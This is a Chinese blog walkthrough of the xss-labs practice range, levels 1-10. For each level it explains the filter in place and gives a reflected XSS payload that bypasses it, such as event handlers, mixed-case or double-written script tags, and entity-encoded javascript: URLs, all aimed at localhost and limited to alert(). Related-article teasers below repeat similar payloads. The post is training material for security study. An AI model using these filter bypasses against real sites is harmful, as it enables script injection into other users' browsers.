xss-labs1-10关

最新推荐文章于 2024-08-26 06:00:00 发布
最新推荐文章于 2024-08-26 06:00:00 发布
阅读量262 收藏
点赞数
分类专栏: 跨站脚本-伪造相关靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/111703794
版权

第一关

第一关超级简单直接插入常规表单

http://127.0.0.1:8086/xss/level1.php?name=<script>alert("xss")</script>

在这里插入图片描述

第二关(html实体转换过滤)

源码分析
运用了htmlspecialchars函数,htmlspecialchars — 将特殊字符转换为 HTML 实体,本函数会返回字符转义后的表示。
运用此函数的意思就是将

http://127.0.0.1:8086/xss/level2.php?keyword="><script>alert("xss")</script>

发现成功了
或者

"><img src="#" οnerrοr=alert(/xss/)>

在这里插入图片描述

第三关(单引号事件型)

源码分析
发现进行了双层html实体过滤
闭合后也不好使了,是不是需要换一个标签呢
对我们换一个构造事件的标签
在这里插入图片描述

第一种方法

因为后边是单引号闭合,所以将事件用单引号闭合

http://127.0.0.1:8086/xss/level3.php?keyword='οnclick='alert(1)

在这里插入图片描述第二种方法

'οnmοuseοver='javascript:alert(1)

在这里插入图片描述

第四关(双引号事件型)

源码分析
str_replace — 子字符串替换(函数直接过滤掉<>,)
将传入的字符串进行了双层替换<>
然后下边又调用了HTML实体函数
其实这些都没什么我们用事件函数就行了
我们看到闭合也是双引号

在这里插入图片描述第一种方法

http://127.0.0.1:8086/xss/level4.php?keyword="οnclick="alert(1)

在这里插入图片描述

http://127.0.0.1:8086/xss/level4.php?keyword="οnmοuseοver="javascript:alert(1)

在这里插入图片描述

第五关(javascript伪协议)

源码分析
第一行就是用的和第四关一样的函数将

第六关(大小写绕过)

源码分析,可以看到,将

"><sCRiPt>alert("xss")</sCRipT>

先闭合,在进行大小写绕过
在这里插入图片描述

第七关(双写绕过)

源码分析
其实这关的代码和上一关的差不多,只不过把所有标签全替换为空格了,我们只能 双写绕过了
在这里插入图片描述"><scrscriptipt>alert("xss")</scrscriptipt>
在这里插入图片描述

第八关(就语句进行html编码就可以)

源码分析,基于上一关,又将双引号给过滤了
然后下边有个友情连接的标签
由于会被htmlspecialchars函数转义,所以可将所有字符编码为HTML实体,从而绕过。
在这里插入图片描述直接将语句给html编码就能过

javascript:alert(/xss/)

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x2f;&#x78;&#x73;&#x73;&#x2f;&#x29;

在这里插入图片描述在这里插入图片描述

第九关()

源码分析
strpos 函数— 查找字符串首次出现的位置
他查找的是http://,所以我们就得加http://标签才能让他报错,输出下边的语句,不过还得编码绕过

在这里插入图片描述&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x2f;&#x78;&#x73;&#x73;&#x2f;&#x29;//http://

在这里插入图片描述在这里插入图片描述

第十关()

源码分析
在这里插入图片描述在前端中修改

将type改成type="test" onclick="alert(1)"

在这里插入图片描述

24team
关注
专栏目录
XSS挑战1-10
kuller_Yan的博客
10-18 335
首先本次做题使用的XSS测试过滤payload为: <img src="avc"><a href="www"><script 'on> 第一题:直接payload <script>alert(1)</script> 第二题:查看源代码发现加了引号,直接绕过。 "><script>alert(1)</script><" 第三题: 源代码: <input name=keyword value='&amp
XSS-LABS 1-19
XINO
11-20 1891
之前学习xss时用过,发出来与大家交流 介绍 XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS 首先介绍一下xss-labxss-lab是一个用于
xsslab10
weixin_63750160的博客
03-04 1184
是 HTML 表单中的一种输入类型,它用于创建一个隐藏的输入字段,用户无法看到或编辑该字段。这种类型的输入字段通常用于在提交表单时传递数据,而不需要用户进行任何操作。将t_sort hidden改成test。给这三个传参看看那个value能接收值。只有t_sort的value接收到了值。之后在点击输入框就成功了。
XSS LABS - Level 10思路
最新发布
Blue17 の 小窝
08-26 1690
可以发现,点击提交后,我们给后端传递了三个参数,这三个参数的 key,正好对应隐藏字段的 name 值,所以,如果懂前端发送请求流程的化,上面修改代码让按钮显现啥的都不要做,直接在 URL 中拼接参数请求即可(我们每次请求都会刷新页面,而我们在当前页面编辑的 HTML 是不长久的,每次重新请求后就会覆盖我们修改的内容,所以上面的修改方法,只是为了来发现,后端以怎样的格式来接收前端的请求)。的值会返回,那么其他参数就无用了,直接删除。回归靶场页面,右击,检查,打开开发者工具,定位到隐藏的标签位置,将。
渗透测试之XSSxss-labs 1-10总结
白帽子九一
11-18 1010
XSS原理: 全称跨站脚本,某种意义上也是一种注入攻击,指攻击者在被攻击的页面上注入恶意脚本代码,受害者访问该页面时,恶意代码会在用户的浏览器上执行。xss不仅扩展javascript代码,还包括flash等其他脚本语言。xss攻击针对的是客户端的攻击,受害者是用户,网站管理员也是用户之一,攻击者可以假冒管理员身份对网站实施攻击。 产生的危害有: 盗取cookie,修改网页内容,网页挂马,利用网页重定向,xss蠕虫。 第一: 没有输入框,那直接在url中写入一段js代码试试(get型): <scri
XSS-10注入靶场闯(小游戏)——第十
qq_39330735的博客
02-04 437
XSS-game-10隐藏入口注入,需要在源代码查找到入口的html标签,然后修改对应的属性让其显示出来。然后再注入payload
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs 1-10
Abc_Kimball的博客
01-31 283
level 1-10Leevel1Level2Level3level4Level5Level6Level7Level8Level9Level10 Leevel1 打开第一开启xss之旅 根据sql注入感觉,URL中的name=test貌似是注入点 不知道大佬为什么感觉这是注入点,我就是觉得URL就是注入点 看别人的是name=通了说明是可以的 OK!下一题 Level2 查看被input和value包含着 所以采用把前面的闭合的方式 "> Level3 onclick 事件 Event
webug 4.0 第十 存储型xss
ONS_cukuyo的博客
04-22 682
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.webug.org...
xss-labs详解(上)1-10
hxhxhxhxx的博客
08-02 1185
xss-labs详解Level 1Level 2htmlspecialcharsLevel 3Level 4Level 5Level 6Level 7Level 8Level 9LevelLevelLevelLevel Level 1 源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-
XSS-labs(1-10)闯详解
m0_46467017的博客
07-25 2918
通过查看可以知道本与上一的不同,在于转换后的内容不同,虽然添加了大小写转换,但是因为转换后,字符被转换为空字符,所以转换后的字符如何仍可以组合成,那么就可以绕过该防御机制。进入第八后,发现无法构造闭合,采用是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的。右键查看源代码,发现我们输入的>,.........
xss-labs 1-10
Cobra的博客
03-26 175
第一 查看源码 <?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?> 这一没有任何防御,我们直接构造xss语句进行注入。 <script>alert(1)</script> 第二 查看源码 <?php ini_set("display_errors"
XSS-labs 1-10
weixin_51559599的博客
11-10 54
跳出 value,在 input 标签中添加事件。没有 value=keyword 的输入框。尖括号被过滤,但输入内容显示再下方的。输入 http:// 的时候合法。发现只有 t_sort 可以传参。javascript 被过滤。双引号匹配跳出 value。匹配 value 的。尝试给三个输入框传参。
xss-labs通详解 Level 6-10
qq_41755084的博客
10-25 1062
这一整体上与第五类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
xss-labs-master 第六到第十
three_year的博客
10-05 689
要想看前面的五请看xss-labs-master 第一到第五 Level 6 进入题目废话不多说,上来就是一个test测试一下会不会变化 可以看到提示信息有输入的内容,昨天我想了一个可以看到JS变化的代码,话不多说直接上(<script Onon>) 通过查看网页源代码,可以知道script、on等键字会在中间加一个下画线,但是大写的键字就不会,所以此题应该就是可以使用大小绕过 绕过语句为"><scRipt>alert(/XSS/)</script>
XSS-Game level 10
热门推荐
wangyuxiang946的博客
07-08 1万+
xssgame10XSS-Game第十过滤了尖括号 > < , 并且隐藏了输入框 , 使用事件绕过,并使输入框取消隐藏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值